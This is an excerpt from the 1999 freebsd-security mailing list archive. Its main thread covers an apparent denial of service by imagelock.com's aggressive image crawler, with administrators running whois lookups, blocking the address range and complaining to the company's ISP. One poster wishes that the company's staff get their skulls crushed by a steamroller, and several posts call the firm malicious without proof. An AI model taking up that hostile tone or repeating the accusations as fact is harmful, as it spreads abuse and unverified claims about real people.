in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 10: 5:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 4210314D93 for ; Sat, 22 May 1999 10:05:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id LAA18214 for ; Sat, 22 May 1999 11:05:32 -0600 (MDT) Message-Id: <4.2.0.37.19990522105949.0465d4a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sat, 22 May 1999 11:05:28 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Denial of service attack from "imagelock.com" Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This morning, someone at the domain "imagelock.com" apparently launched a denial of service attack against a Web server I administer. The abuser was repeatedly downloading large image files simultaneously. While the log entries say that the user agent was "Mozilla /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly browse that fast. Because that server has a limited amount of Internet bandwidth, and because it also handles several dial-up connections and Web sites, many people were being severely impacted by this abuse. When we attempted to trace the attack to the source, we noted that the abuser was attempting to prevent the determination of his or her address by enabling reverse but not forward name resolution. We locked them out of the Web server, but not before they brought several e-commerce Web sites to a crawl. Who are these people? Sincerely, Brett Glass, System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 10:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 83B5114D93 for ; Sat, 22 May 1999 10:14:34 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id KAA74179; Sat, 22 May 1999 10:14:26 -0700 (PDT) (envelope-from dillon) Date: Sat, 22 May 1999 10:14:26 -0700 (PDT) From: Matthew Dillon Message-Id: <199905221714.KAA74179@apollo.backplane.com> To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" References: <4.2.0.37.19990522105949.0465d4a0@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :This morning, someone at the domain "imagelock.com" apparently launched a :denial of service attack against a Web server I administer. The abuser was :repeatedly downloading large image files simultaneously. While the log :entries say that the user agent was "Mozilla :/3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly :browse that fast. : :Because that server has a limited amount of Internet bandwidth, and because :it also handles several dial-up connections and Web sites, many people were :being severely impacted by this abuse. When we attempted to trace the :attack to the source, we noted that the abuser was attempting to prevent :the determination of his or her address by enabling reverse but not forward :name resolution. We locked them out of the Web server, but not before they :brought several e-commerce Web sites to a crawl. If they are actually making TCP connections, then their IP address is likely to be valid. This means you should be able to traceroute the IP address to see what the last hop network is. You can then complain to that network - I'd call up their NOC. :Who are these people? The information provided is not sufficient for us to make that determination. Perhaps if you provided the IP address(es) the attack is coming from? :Sincerely, :Brett Glass, System Administrator -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 10:28:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id A38E414D93 for ; Sat, 22 May 1999 10:28:43 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id LAA18375; Sat, 22 May 1999 11:28:38 -0600 (MDT) Message-Id: <4.2.0.37.19990522112658.0466ec90@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sat, 22 May 1999 11:28:28 -0600 To: Matthew Dillon From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: security@FreeBSD.ORG In-Reply-To: <199905221714.KAA74179@apollo.backplane.com> References: <4.2.0.37.19990522105949.0465d4a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:14 AM 5/22/99 -0700, Matthew Dillon wrote: > If they are actually making TCP connections, then their IP address is > likely to be valid. This means you should be able to traceroute the > IP address to see what the last hop network is. You can then complain > to that network - I'd call up their NOC. The addresses were all over one Class C: 209.133.111/24. We've complained to ABOVE.NET, which seems to have control of that Class C. No response yet. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 11:16:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C185E14E1E for ; Sat, 22 May 1999 11:16:07 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA74448; Sat, 22 May 1999 12:14:54 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA06767; Sat, 22 May 1999 12:14:55 -0600 (MDT) Message-Id: <199905221814.MAA06767@harmony.village.org> To: Wes Peters Subject: Re: secure deletion Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 22 May 1999 10:01:10 MDT." <3746D4C6.4A284FE0@softweyr.com> References: <3746D4C6.4A284FE0@softweyr.com> <199905220836.CAA02030@harmony.village.org> Date: Sat, 22 May 1999 12:14:55 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <3746D4C6.4A284FE0@softweyr.com> Wes Peters writes: : If you're really concerned about security, you'll want this on enabled : on swap spaces, too, just in case sensitive data got swapped to disk. : You can't avoid having it on disk while the page is active, but certainly : want it securely erased when the page is no longer in use. That would also be desirable in some instances. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 11:30:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id F368914E60 for ; Sat, 22 May 1999 11:30:28 -0700 (PDT) (envelope-from rgrimes@gndrsh.aac.dev.com) Received: (from rgrimes@localhost) by gndrsh.aac.dev.com (8.9.3/8.9.3) id LAA04096; Sat, 22 May 1999 11:29:42 -0700 (PDT) (envelope-from rgrimes) From: "Rodney W. Grimes" Message-Id: <199905221829.LAA04096@gndrsh.aac.dev.com> Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <4.2.0.37.19990522112658.0466ec90@localhost> from Brett Glass at "May 22, 1999 11:28:28 am" To: brett@lariat.org (Brett Glass) Date: Sat, 22 May 1999 11:29:41 -0700 (PDT) Cc: dillon@apollo.backplane.com (Matthew Dillon), security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > At 10:14 AM 5/22/99 -0700, Matthew Dillon wrote: > > > If they are actually making TCP connections, then their IP address is > > likely to be valid. This means you should be able to traceroute the > > IP address to see what the last hop network is. You can then complain > > to that network - I'd call up their NOC. > > The addresses were all over one Class C: 209.133.111/24. We've complained > to ABOVE.NET, which seems to have control of that Class C. No response yet. > Did you even try the simple way: gndrsh:root {169}# whois imagelock.com ImageLock.com (SJCENTER-DOM) SJCENTER.COM Imagelock, INC (IMAGELOCK2-DOM) IMAGELOCK.COM gndrsh:root {170}# whois \!imagelock2-dom Registrant: Imagelock, INC (IMAGELOCK2-DOM) 2125 Powell San Francisco, CA 94133 US Domain Name: IMAGELOCK.COM Administrative Contact, Technical Contact, Zone Contact: Force, Thomas (TF4115) info@IMAGELOCK.COM 415 392 3444 Billing Contact: Force, Thomas (TF4115) info@IMAGELOCK.COM 415 392 3444 Record last updated on 23-Feb-99. Record created on 23-Feb-99. Database last updated on 21-May-99 13:16:04 EDT. Domain servers in listed order: NS1.IMAGELOCK.COM 209.133.111.124 NS2.IMAGELOCK.COM 209.133.111.140 gndrsh:root {171}# host www.imagelock.com www.imagelock.com is a nickname for M0001.imagelock.com M0001.imagelock.com has address 209.133.111.124 M0001.imagelock.com mail is handled (pri=5) by M0001.imagelock.com gndrsh:root {172}# lynx www.imagelock.com Currently tracking over 7,000,000 Websites and 175,000,000 digital assets. ImageLock.com - The Ultimate Internet Tracking Tool and Intellectual Property (IP) management service, enables you to pin-point the information you need, and effortlessly enforce your IP Protection policy! ImageLock(TM) is the Internet's only source for comprehensive tracking of your website's images, logos, audio files, and text phrases across the Internet's million of websites, newgroups, FTP sites, etc... Imagelock(TM) has developed a state-of-the-art and easy-to-use Internet based service which delivers complete solutions from asset location to copyright enforcement. You specify the Website - Imagelock(TM) tracks your digital media assets and enforces your intellectual property rights throughout the Internet! Imagelock(TM) can tell you: Where are your images (logos, pictures, etc.)? Who is hot-linked to your website? Where is your name showing up? On a list? In a meta-tag? Who has your MP3 files? Who is plagiarizing your website? Who is using or abusing your intellectual property? Imagelock(TM) can provide you: ... I'd say this wasn't a purposeful DOS attack, but a major mistack on the part of imagelock's techniques... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD http://www.aai.dnsmgr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 16:24:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id C0E2614FEA for ; Sat, 22 May 1999 16:24:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA20388; Sat, 22 May 1999 17:24:22 -0600 (MDT) Message-Id: <4.2.0.37.19990522171752.04638eb0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sat, 22 May 1999 17:24:16 -0600 To: "Rodney W. Grimes" From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: dillon@apollo.backplane.com (Matthew Dillon), security@FreeBSD.ORG In-Reply-To: <199905221829.LAA04096@gndrsh.aac.dev.com> References: <4.2.0.37.19990522112658.0466ec90@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:29 AM 5/22/99 -0700, Rodney W. Grimes wrote: >Did you even try the simple way: Yes, I did. Unfortunately, there's no way of telling whether the company is what it says it is or why it would have attempted to hit the server with so many rapid-fire requests from multiple IP addresses. I've been trying to contact the company and hopefully we will know soon. However, in the meantime, I'd STRONGLY recommend that people firewall its IPs -- 209.133.111/24. At best, they're terribly misguided; at worse, they're outright malicious. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 18:17:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from 001101.zer0.org (001101.zer0.org [206.24.105.163]) by hub.freebsd.org (Postfix) with ESMTP id 6765914E85 for ; Sat, 22 May 1999 18:17:13 -0700 (PDT) (envelope-from gsutter@001101.zer0.org) Received: (from gsutter@localhost) by 001101.zer0.org (8.9.2/8.9.2) id SAA03021; Sat, 22 May 1999 18:16:25 -0700 (PDT) (envelope-from gsutter) Date: Sat, 22 May 1999 18:16:25 -0700 From: Gregory Sutter To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Message-ID: <19990522181624.B93974@001101.zer0.org> References: <4.2.0.37.19990522105949.0465d4a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.2.0.37.19990522105949.0465d4a0@localhost>; from Brett Glass on Sat, May 22, 1999 at 11:05:28AM -0600 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > This morning, someone at the domain "imagelock.com" apparently launched a > denial of service attack against a Web server I administer. The abuser was > repeatedly downloading large image files simultaneously. While the log > entries say that the user agent was "Mozilla > /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly > browse that fast. imagelock.com has been banned from my web servers ever since they initiated a DoS attack against me a few months ago. Basically, they download every accessible file on a website. The company's MO is to check all images, etc. on a site in order to determine where on teh web "copyrighted information" is being stored, so people can be prosecuted for misusing copyrighted images. Not only does their hard-hitting web client suck, their business model is disgusting. I hate everything about these people; I hope their skulls accidentally get crushed by a steamroller. Greg -- Gregory S. Sutter Was Jimi's modem a Purple Hayes? mailto:gsutter@pobox.com http://www.pobox.com/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 18:40:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from Rigel.orionsys.com (rigel.orionsys.com [205.148.224.9]) by hub.freebsd.org (Postfix) with ESMTP id 13B0D151C5 for ; Sat, 22 May 1999 18:40:48 -0700 (PDT) (envelope-from root@Rigel.orionsys.com) Received: from localhost (root@localhost) by Rigel.orionsys.com (8.8.8/8.8.8) with ESMTP id SAA28611; Sat, 22 May 1999 18:40:23 -0700 (PDT) (envelope-from root@Rigel.orionsys.com) Date: Sat, 22 May 1999 18:40:20 -0700 (PDT) From: David Babler To: Gregory Sutter Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <19990522181624.B93974@001101.zer0.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 22 May 1999, Gregory Sutter wrote: > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > > This morning, someone at the domain "imagelock.com" apparently launched a > > denial of service attack against a Web server I administer. The abuser was > > repeatedly downloading large image files simultaneously. While the log > > entries say that the user agent was "Mozilla > > /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly > > browse that fast. > > imagelock.com has been banned from my web servers ever since they > initiated a DoS attack against me a few months ago. Basically, they > download every accessible file on a website. The company's MO is to > check all images, etc. on a site in order to determine where on teh > web "copyrighted information" is being stored, so people can be > prosecuted for misusing copyrighted images. > > Not only does their hard-hitting web client suck, their business model > is disgusting. I hate everything about these people; I hope their > skulls accidentally get crushed by a steamroller. Their web client also gleefully ignores robots.txt as well, and spent 2 hours here chasing web poisoned pages - apparently quitting only when it didn't find any images to fingerprint. So they're now blocked here at the firewall too - thanks for the heads-up. Wonder how much they can sell their service for when they find they don't have access to poke around? -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 19:34:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from 001101.zer0.org (001101.zer0.org [206.24.105.163]) by hub.freebsd.org (Postfix) with ESMTP id 97DBD14C3A for ; Sat, 22 May 1999 19:34:09 -0700 (PDT) (envelope-from gsutter@001101.zer0.org) Received: (from gsutter@localhost) by 001101.zer0.org (8.9.2/8.9.2) id TAA04201; Sat, 22 May 1999 19:33:12 -0700 (PDT) (envelope-from gsutter) Date: Sat, 22 May 1999 19:33:12 -0700 From: Gregory Sutter To: David Babler Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Message-ID: <19990522193312.C93974@001101.zer0.org> References: <19990522181624.B93974@001101.zer0.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from David Babler on Sat, May 22, 1999 at 06:40:20PM -0700 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote: > > > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > > > This morning, someone at the domain "imagelock.com" apparently launched a > > > denial of service attack against a Web server I administer. The abuser was > > imagelock.com has been banned from my web servers ever since they > > initiated a DoS attack against me a few months ago. Basically, they > > download every accessible file on a website. The company's MO is to > > Their web client also gleefully ignores robots.txt as well, and spent 2 > hours here chasing web poisoned pages - apparently quitting only when it > didn't find any images to fingerprint. So they're now blocked here at the > firewall too - thanks for the heads-up. Wonder how much they can sell > their service for when they find they don't have access to poke around? Likely they will either give up (I doubt they're getting many customers right now anyway...) or make like the spammers, disguising their entry points and using third-party relays, etc. At least people's eyes have been opened by the spammer bag o' tricks. Greg -- Gregory S. Sutter My reality check just bounced. mailto:gsutter@pobox.com http://www.pobox.com/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 20:27:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 89F7F14F95 for ; Sat, 22 May 1999 20:27:28 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id VAA21729; Sat, 22 May 1999 21:27:11 -0600 (MDT) Message-Id: <4.2.0.37.19990522212103.04683cc0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sat, 22 May 1999 21:23:59 -0600 To: David Babler , Gregory Sutter From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: security@FreeBSD.ORG In-Reply-To: References: <19990522181624.B93974@001101.zer0.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greg, David: Apparently, their ISP, ABOVE.NET, does listen to complaints. It would probably help others like us if you (and anyone else who's been hit by imagelock.com) could send accounts of these incidents to noc@above.net, carlos@akshun.above.net, and dlr@above.net. --Brett Glass At 06:40 PM 5/22/99 -0700, David Babler wrote: >On Sat, 22 May 1999, Gregory Sutter wrote: > > > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > > > This morning, someone at the domain "imagelock.com" apparently > launched a > > > denial of service attack against a Web server I administer. The > abuser was > > > repeatedly downloading large image files simultaneously. While the log > > > entries say that the user agent was "Mozilla > > > /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly > > > browse that fast. > > > > imagelock.com has been banned from my web servers ever since they > > initiated a DoS attack against me a few months ago. Basically, they > > download every accessible file on a website. The company's MO is to > > check all images, etc. on a site in order to determine where on teh > > web "copyrighted information" is being stored, so people can be > > prosecuted for misusing copyrighted images. > > > > Not only does their hard-hitting web client suck, their business model > > is disgusting. I hate everything about these people; I hope their > > skulls accidentally get crushed by a steamroller. > >Their web client also gleefully ignores robots.txt as well, and spent 2 >hours here chasing web poisoned pages - apparently quitting only when it >didn't find any images to fingerprint. So they're now blocked here at the >firewall too - thanks for the heads-up. Wonder how much they can sell >their service for when they find they don't have access to poke around? > >-Dave > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 22: 1:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from waveconcepts.com (waveconcepts.com [207.126.116.40]) by hub.freebsd.org (Postfix) with ESMTP id 54332152D2 for ; Sat, 22 May 1999 22:01:38 -0700 (PDT) (envelope-from siberian@siberian.org) Received: from [199.108.171.41] ([199.108.171.41]) by waveconcepts.com (8.9.2/8.9.2) with ESMTP id WAA06391 for ; Sat, 22 May 1999 22:00:20 -0700 (PDT) Mime-Version: 1.0 X-Sender: siberian@207.126.116.40 Message-Id: In-Reply-To: <4.2.0.37.19990522212103.04683cc0@localhost> References: <19990522181624.B93974@001101.zer0.org> <4.2.0.37.19990522212103.04683cc0@localhost> Date: Sat, 22 May 1999 21:56:17 -0700 To: security@FreeBSD.ORG From: John Armstrong Subject: Re: Denial of service attack from "imagelock.com" Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Also hit abuse@above.net. They take these things really seriously, I know, I have been shutdown by them before for relaying mail. John- At 9:23 PM -0600 5/22/99, Brett Glass wrote: >Greg, David: > >Apparently, their ISP, ABOVE.NET, does listen to complaints. It would probably >help others like us if you (and anyone else who's been hit by imagelock.com) >could send accounts of these incidents to noc@above.net, >carlos@akshun.above.net, >and dlr@above.net. > >--Brett Glass > >At 06:40 PM 5/22/99 -0700, David Babler wrote: > > >>On Sat, 22 May 1999, Gregory Sutter wrote: >> >> > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: >> > > This morning, someone at the domain "imagelock.com" apparently >>launched a >> > > denial of service attack against a Web server I administer. >>The abuser was >> > > repeatedly downloading large image files simultaneously. While the log >> > > entries say that the user agent was "Mozilla >> > > /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly >> > > browse that fast. >> > >> > imagelock.com has been banned from my web servers ever since they >> > initiated a DoS attack against me a few months ago. Basically, they >> > download every accessible file on a website. The company's MO is to >> > check all images, etc. on a site in order to determine where on teh >> > web "copyrighted information" is being stored, so people can be >> > prosecuted for misusing copyrighted images. >> > >> > Not only does their hard-hitting web client suck, their business model >> > is disgusting. I hate everything about these people; I hope their >> > skulls accidentally get crushed by a steamroller. >> >>Their web client also gleefully ignores robots.txt as well, and spent 2 >>hours here chasing web poisoned pages - apparently quitting only when it >>didn't find any images to fingerprint. So they're now blocked here at the >>firewall too - thanks for the heads-up. Wonder how much they can sell >>their service for when they find they don't have access to poke around? >> >>-Dave >> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- "..it seems, to put an even more bizarre twist to the story, that it is not illegal to export listings of encryption programs. Presumably, the enemies of freedom cannot read." - Apache : The Definitive Guide To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 12:24: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 6A28314C8A for ; Sun, 23 May 1999 12:23:57 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id NAA26569; Sun, 23 May 1999 13:23:52 -0600 (MDT) Message-Id: <4.2.0.37.19990523131810.04669d30@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sun, 23 May 1999 13:23:47 -0600 To: Gregory Sutter From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: security@FreeBSD.ORG In-Reply-To: <19990522181624.B93974@001101.zer0.org> References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:16 PM 5/22/99 -0700, Gregory Sutter wrote: >imagelock.com has been banned from my web servers ever since they >initiated a DoS attack against me a few months ago. Basically, they >download every accessible file on a website. The company's MO is to >check all images, etc. on a site in order to determine where on teh >web "copyrighted information" is being stored, so people can be >prosecuted for misusing copyrighted images. In short, they scan Person A's Web site for images that are also on Person B's Web site, and if they find a match, they say, "Let's you and him fight. Oh, and by the way, you ought to be paying me for finding this horrible copyright violation." This is one step below an amulance-chasing lawyer, IMHO, because they first STIMULATE the conflict and then try to profiteer on it. >Not only does their hard-hitting web client suck, Indeed it does. I found a log that shows that imagelock.com accounted for *25%* of the traffic on delta.net's Web servers last October. And delta.net is a *big* ISP! (I hear they recently merged with Concentric, so now they're bigger still.) >their business model >is disgusting. I hate everything about these people; I hope their >skulls accidentally get crushed by a steamroller. I don't know whether or not this would help. But complaining to their ISP probably would. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 13:22: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46]) by hub.freebsd.org (Postfix) with ESMTP id E3DB514F48 for ; Sun, 23 May 1999 13:21:50 -0700 (PDT) (envelope-from ratebor@cityline.ru) Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19]) by pro.icp.ac.ru (8.9.2/8.8.7) with SMTP id AAA30168; Mon, 24 May 1999 00:23:00 +0400 (MSD) (envelope-from ratebor@cityline.ru) Date: Mon, 24 May 1999 00:22:57 +0400 From: Dmitriy Bokiy X-Mailer: The Bat! (v1.32) UNREG / CD5BF9353B3B7091 Reply-To: Dmitriy Bokiy X-Priority: 3 (Normal) Message-ID: <715.990524@cityline.ru> To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-reply-To: <4.2.0.37.19990522105949.0465d4a0@localhost> References: <4.2.0.37.19990522105949.0465d4a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Saturday, May 22, 1999, 21:05:28 Brett Glass wrote: > This morning, someone at the domain "imagelock.com" apparently launched a > denial of service attack against a Web server I administer. The abuser was > repeatedly downloading large image files simultaneously. While the log > entries say that the user agent was "Mozilla > /3.01C-PBWF", this was clearly spoofed; no Netscape user could possibly > browse that fast. > Because that server has a limited amount of Internet bandwidth, and because > it also handles several dial-up connections and Web sites, many people were > being severely impacted by this abuse. When we attempted to trace the > attack to the source, we noted that the abuser was attempting to prevent > the determination of his or her address by enabling reverse but not forward > name resolution. We locked them out of the Web server, but not before they > brought several e-commerce Web sites to a crawl. They probably used an off-line browser(or several of them). This stuff CAN do simultaneous downloading of web pages, images or whatever and is rather configurable. It can be configured to identify itself as MSIE, Netscape, anonymous or you choose. There are also parameters like maximum number of simultaneous threads (usual default is 10)and so-called Netiquette options(obey or not Robot Exclusion Standard, delay between threads etc.). > Who are these people? So my theory is they are who they honestly said they are. Just breaking some Netiquette rules and must be inspired(or forced)not do that anymore. --Dmitriy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 13:40:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46]) by hub.freebsd.org (Postfix) with ESMTP id 0FC6E14D4F for ; Sun, 23 May 1999 13:40:26 -0700 (PDT) (envelope-from ratebor@cityline.ru) Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19]) by pro.icp.ac.ru (8.9.2/8.8.7) with SMTP id AAA33398; Mon, 24 May 1999 00:42:13 +0400 (MSD) (envelope-from ratebor@cityline.ru) Date: Mon, 24 May 1999 00:42:11 +0400 From: Dmitriy Bokiy X-Mailer: The Bat! (v1.32) UNREG / CD5BF9353B3B7091 Reply-To: Dmitriy Bokiy X-Priority: 3 (Normal) Message-ID: <1229.990524@cityline.ru> To: Pete Fritchman Cc: security@FreeBSD.ORG Subject: Re[2]: Denial of service attack from "imagelock.com" In-reply-To: <99052316335200.01507@petef> References: <99052316335200.01507@petef> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Monday, May 24, 1999, 0:32:32 Pete Fritchman wrote: > Read their webpage. It's not an off-line browser, it's a place that tracks > copyrights as someone else on the list said. Yes, that`s what I meant by saying that they said who they are. I think that was just some employees deliberately misusing their off-line browsers. --Dmitriy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 14:24: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by 